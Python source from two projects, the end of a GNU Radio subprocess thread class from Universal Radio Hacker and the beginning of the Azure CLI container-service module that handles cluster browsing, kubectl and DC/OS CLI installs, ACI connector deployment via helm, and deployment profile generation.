self._bandwidth = bandwidth
self._receiving = receiving # False for Sender-Thread
self.usrp_ip = "192.168.10.2"
self.device = "USRP"
self.current_index = 0
self.context = None
self.socket = None
if constants.SETTINGS.value("use_gnuradio_install_dir", False, bool):
gnuradio_dir = constants.SETTINGS.value("gnuradio_install_dir", "")
with open(os.path.join(tempfile.gettempdir(), "gnuradio_path.txt"), "w") as f:
f.write(gnuradio_dir)
self.python2_interpreter = os.path.join(gnuradio_dir, "gr-python27", "python.exe")
else:
self.python2_interpreter = constants.SETTINGS.value("python2_exe", "")
self.queue = Queue()
self.data = None # Placeholder for SenderThread
self.current_iteration = 0 # Counts number of Sendings in SenderThread
self.tb_process = None
@property
def sample_rate(self):
return self._sample_rate
@sample_rate.setter
def sample_rate(self, value):
self._sample_rate = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'SR:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def freq(self):
return self._freq
@freq.setter
def freq(self, value):
self._freq = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'F:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def gain(self):
return self._gain
@gain.setter
def gain(self, value):
self._gain = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'G:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def bandwidth(self):
return self._bandwidth
@bandwidth.setter
def bandwidth(self, value):
self._bandwidth = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'BW:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
def initalize_process(self):
self.started.emit()
if not hasattr(sys, 'frozen'):
rp = os.path.dirname(os.path.realpath(__file__))
else:
rp = os.path.join(os.path.dirname(sys.executable), "dev", "gr")
rp = os.path.realpath(os.path.join(rp, "scripts"))
suffix = "_recv.py" if self._receiving else "_send.py"
filename = self.device.lower() + suffix
if not self.python2_interpreter:
raise Exception("Could not find python 2 interpreter. Make sure you have a running gnuradio installation.")
options = [self.python2_interpreter, os.path.join(rp, filename),
"--samplerate", str(self.sample_rate), "--freq", str(self.freq),
"--gain", str(self.gain), "--bandwidth", str(self.bandwidth),
"--port", str(self.port)]
if self.device.upper() == "USRP":
options.extend(["--ip", self.usrp_ip])
logger.info("Starting Gnuradio")
self.tb_process = Popen(options, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=1)
logger.info("Started Gnuradio")
t = Thread(target=self.enqueue_output, args=(self.tb_process.stderr, self.queue))
t.daemon = True # thread dies with the program
t.start()
def init_recv_socket(self):
logger.info("Initalizing receive socket")
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PULL)
logger.info("Initalized receive socket")
while not self.isInterruptionRequested():
try:
time.sleep(0.1)
logger.info("Trying to get a connection to gnuradio...")
self.socket.connect("tcp://{0}:{1}".format(self.ip, self.port))
logger.info("Got connection")
break
except (ConnectionRefusedError, ConnectionResetError):
continue
except Exception as e:
logger.error("Unexpected error", str(e))
def run(self):
pass
def read_errors(self):
result = []
while True:
try:
result.append(self.queue.get_nowait())
except Empty:
break
result = b"".join(result)
return result.decode("utf-8")
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def stop(self, msg: str):
if msg and not msg.startswith("FIN"):
self.requestInterruption()
if self.tb_process:
logger.info("Kill grc process")
self.tb_process.kill()
logger.info("Term grc process")
self.tb_process.terminate()
self.tb_process = None
logger.info(msg)
self.stopped.emit()
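# Hedged sketch (an assumption, not part of URH): a minimal receiver subclass that
# shows how the pieces above are meant to be combined - start the GNU Radio
# subprocess, connect the ZeroMQ PULL socket, then pull raw sample bytes until an
# interruption is requested.
class _ExampleReceiverThread(AbstractBaseThread):
    def run(self):
        self.initalize_process()
        self.init_recv_socket()
        while not self.isInterruptionRequested():
            try:
                self.data = self.socket.recv(flags=zmq.NOBLOCK)
            except zmq.Again:
                self.msleep(10)  # QThread sleep, in milliseconds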
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.role.custom import _resolve_service_principal
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
GraphErrorException,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile
from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.models import ManagedCluster
from azure.mgmt.containerservice.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
    :param resource_group: Name of the Azure container service's resource group.
    :type resource_group: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file)
elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
else:
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
    :param name: Name of the target Azure container service instance.
:type name: String
    :param resource_group: Name of the Azure container service's resource group.
    :type resource_group: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
return
def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
elif orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
else:
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
        raise CLIError("Unsupported platform '{}'; cannot download the DC/OS client for it.".format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
if client_version == 'latest':
context = _ssl_context()
version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt',
context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError("Unsupported platform '{}'; cannot download kubectl for it.".format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
    # Validate the location against the available ACI regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = _get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _get_subscription_id(cli_ctx):
_, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None)
return sub_id
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
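# Hedged illustration (an assumption, not part of the original module): the helper
# above keeps only letters, digits and dashes, truncates the pieces to 10/16/6
# characters and joins them; e.g. name "myCluster0!", resource group "my-rg" and a
# subscription id starting with "abcdef" yield "myCluster0-my-rg-abcdef".
def _example_default_dns_prefix():
    return _get_default_dns_prefix("myCluster0!", "my-rg", "abcdef12-3456-7890-abcd-ef1234567890")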
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'.
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
